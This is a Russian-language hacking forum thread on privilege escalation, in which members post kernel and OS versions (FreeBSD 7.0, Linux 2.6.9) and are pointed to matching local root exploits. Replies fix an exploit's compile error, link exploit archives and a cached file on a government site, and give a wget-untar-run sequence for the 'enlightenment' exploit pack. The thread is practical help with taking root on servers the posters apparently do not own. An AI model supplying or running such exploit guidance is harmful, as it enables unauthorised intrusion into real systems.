повышение прав [задай вопрос - получи ответ]

Discussion in 'Уязвимости' started by Konqi, 15 Oct 2010.

Thread Status:
Not open for further replies.
  1. sevenup

    sevenup Member

    Joined:
    4 Oct 2009
    Messages:
    100
    Likes Received:
    17
    Reputations:
    7
    А гугл переводчик использовать, религия не позволяет ?
    по первой ошибке...
    В конце файла добавь пустую строку, как просит компилятор...
    снова скомпилируй и запускай....
    P.S. Если выскакивают при компиляции warning сообщения, это не мешает сплойту скомпилится!
     
  2. ne0k

    ne0k New Member

    Joined:
    3 Mar 2011
    Messages:
    51
    Likes Received:
    1
    Reputations:
    0
    Давай не умничать, ок? Причем тут гугл переводчик? Там конкретно ошибка:

    /var/tmp//ccvijMZ6.o(.text+0x1ee): In function `main':
    : undefined reference to `pthread_create'
    /var/tmp//ccvijMZ6.o(.text+0x203): In function `main':
    : undefined reference to `pthread_create'

    И эту лабуду я сам могу перевести, без всяких переводчиков, но толку? Я ясно написал, что в Си подобных языках я ноль, и исправить эту ошибку я не в силах. Если по факту знаешь, в чем ошибка, напиши, буду благодарен.

    з.ы.: То, что new line в конце поставить нужно, не сложно догадаться. И опять же, толку?
     
  3. sevenup

    sevenup Member

    Joined:
    4 Oct 2009
    Messages:
    100
    Likes Received:
    17
    Reputations:
    7
    А кто умничает ?
    1. сплойт нужно компилить с флагом -lpthread
    2. Твоя ошибка появляется когда этот флаг не используется!
    3. Вот строка из man gcc:
    Code:
    -pthread
               Adds support for multithreading with the pthreads library.  This
               option sets flags for both the preprocessor and linker.
    
    4. Сплойт работает на x64 системах.
     
  4. ne0k

    ne0k New Member

    Joined:
    3 Mar 2011
    Messages:
    51
    Likes Received:
    1
    Reputations:
    0
    Попробовал с флагом -lpthread, ничего не происходит, никакого output'а..
    А под x86 что нибудь есть?
     
  5. fairy_long_nose

    fairy_long_nose New Member

    Joined:
    30 Apr 2009
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Ни туда, ни сюда... Может я что пропустил? Подскажите что может подойти под него.
     
  6. sevenup

    sevenup Member

    Joined:
    4 Oct 2009
    Messages:
    100
    Likes Received:
    17
    Reputations:
    7
    Попробуй вот это:
    http://webcache.googleusercontent.com/search?q=cache:9Tz4RCIUYLoJ:www.jkmwpkl.gov.my/1.txt+http://www.jkmwpkl.gov.my/1.txt&cd=3&hl=ru&ct=clnk&gl=ua&client=firefox&source=www.google.com.ua

    Линк на вебкеш даю т.к. страницы на сайте уже нету...
     
  7. z0mbyak

    z0mbyak Active Member

    Joined:
    10 Apr 2010
    Messages:
    537
    Likes Received:
    200
    Reputations:
    293
    Лучше попробуй enlightenment _http://grsecurity.net/~spender/enlightenment.tgz, она точно пробить должна....
     
  8. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    1. wget http://www.grsecurity.net/~spender/enlightenment.tgz
    2. tar -zxf enlightenment.tgz
    3. cd enlightenment
    4. ./run_null_exploits.sh
    5. ???
    6. PROFIT!!!

    Сохрани где нибудь, пробив ~ до июня 2009 года
     
    _________________________
  9. fairy_long_nose

    fairy_long_nose New Member

    Joined:
    30 Apr 2009
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Спасибо ребят, попробую. Сам думал, что 100% должен сработать enlightenment, но не сраслось. Дохрена хидеров не хватает для сборки. Хоть такую же систему поднимай на виртуалке что бы только бинарник собрать ;)) Чем я наверно сегодня ночью и займусь ;)
     
  10. vaddd

    vaddd Member

    Joined:
    6 Jan 2009
    Messages:
    140
    Likes Received:
    19
    Reputations:
    9
    есть ли рабочие сплойты под нее?
     
  11. sevenup

    sevenup Member

    Joined:
    4 Oct 2009
    Messages:
    100
    Likes Received:
    17
    Reputations:
    7
    Полный вывод команды uname -a показывать надо!
    Покажи вывод команды:
    PHP:
    ls -al /libexecuname -a;
     
  12. vaddd

    vaddd Member

    Joined:
    6 Jan 2009
    Messages:
    140
    Likes Received:
    19
    Reputations:
    9
    вот результат выполнения обоих комманд
     
  13. vaddd

    vaddd Member

    Joined:
    6 Jan 2009
    Messages:
    140
    Likes Received:
    19
    Reputations:
    9
    туплю...

    ls -al /libexec
     
  14. sevenup

    sevenup Member

    Joined:
    4 Oct 2009
    Messages:
    100
    Likes Received:
    17
    Reputations:
    7
    Попробуй вот этот:
    _http://cworld.org.ua/news/exploit-fbsd-rtld-full-package/
    если не возьмёт, тогда вот этот:
    _http://rdot.org/forum/showthread.php?t=601


    P.S. второй сплойт там в 3-х вариантах...тему полистай...
     
  15. z0mbyak

    z0mbyak Active Member

    Joined:
    10 Apr 2010
    Messages:
    537
    Likes Received:
    200
    Reputations:
    293
    Поправочка, приблизительно до начала 2010, там же еще Pipe.c)
     
    1 person likes this.
  16. plaeer

    plaeer New Member

    Joined:
    8 Mar 2011
    Messages:
    149
    Likes Received:
    3
    Reputations:
    1
    FreeBSD --- 7.0-RELEASE FreeBSD 7.0-RELEASE #0: Sun Feb 24 19:59:52 UTC 2008
    Что под этот взять?
     
  17. z0mbyak

    z0mbyak Active Member

    Joined:
    10 Apr 2010
    Messages:
    537
    Likes Received:
    200
    Reputations:
    293
    Ну и http://1337day.com/exploits/8002
    http://1337day.com/exploits/7910
    попробуй...
    P.S. Выкладывай полностью сведения о системе.
     
  18. plaeer

    plaeer New Member

    Joined:
    8 Mar 2011
    Messages:
    149
    Likes Received:
    3
    Reputations:
    1
    FreeBSD --- 7.0-RELEASE FreeBSD 7.0-RELEASE #0: Sun Feb 24 19:59:52 UTC 2008 [email protected]:/usr/obj/usr/src/sys/GENERIC i386
     
  19. sevenup

    sevenup Member

    Joined:
    4 Oct 2009
    Messages:
    100
    Likes Received:
    17
    Reputations:
    7
    Вот этот пробьёт:
    http://www.exploit-db.com/exploits/10255/
     
  20. Koren

    Koren Member

    Joined:
    11 Jul 2009
    Messages:
    66
    Likes Received:
    20
    Reputations:
    1
    Linux 2.6.9-023stab053.2-enterprise #1 SMP Mon Oct 25 18:37:43 MSD
    2010 i686 будет что под него?
     
Thread Status:
Not open for further replies.